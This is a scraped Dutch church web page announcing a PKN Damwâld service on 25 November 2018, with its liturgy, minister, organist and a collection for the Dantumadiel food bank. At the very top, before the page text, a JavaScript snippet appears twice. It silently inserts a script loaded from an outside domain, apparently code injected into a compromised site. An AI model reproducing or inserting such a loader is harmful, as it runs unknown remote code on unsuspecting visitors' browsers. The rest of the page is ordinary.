;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 25 november 2018 9:30 uur - PKN Damwâld
zondag 25 november 2018
09:30 uur

Kerkdienst zondag 25 november 2018 9:30 uur

Thema: Laatste zondag van het kerkelijk jaar / Eeuwigheidszondag

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jaap van der Horn
Thema:Laatste zondag van het kerkelijk jaar / Eeuwigheidszondag
Liturgie
lied voor de dienst Gez.14: 1 en 2
Welkom
We zingen: Ps. 42: 1 en 3
Stil gebed, Votum en groet
We zingen: Elb 376: 1 en 2
Geloofsbelijdenis
We zingen: ELB. 371:1, 3 en 4
Gebed
We lezen: Dt.31: 1 - 8
We zingen: Ps. 90: 1 en 8
Preek .
We zingen: ELB 189a: 1 en 2
Lijst met namen en aansteken van kaarsen
We zingen: ELB 191: 1 en 3
Dankzegging en voorbede
Collecte
slotlied : ELB 413:1,2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Stichting Voedselbank Dantumadiel

De vandaag te houden collecte is bestemd voor financiële ondersteuning van de eind 2011 van start
gegane voedselbank Dantumadiel. Het doel van de voedselbank is: voedselhulp bieden aan mensen die het tijdelijk heel moeilijk hebben; verspilling van voedsel tegengaan, jaarlijks wordt er in Nederland een vijfde deel (20%) van ons voedsel weggegooid; verwijsfunctie naar officiële instellingen, velen weten de weg nog niet te vinden naar allerlei hulpverlenende instanties

Tweede collecte: Kerk
Uitganscollecte: Kerk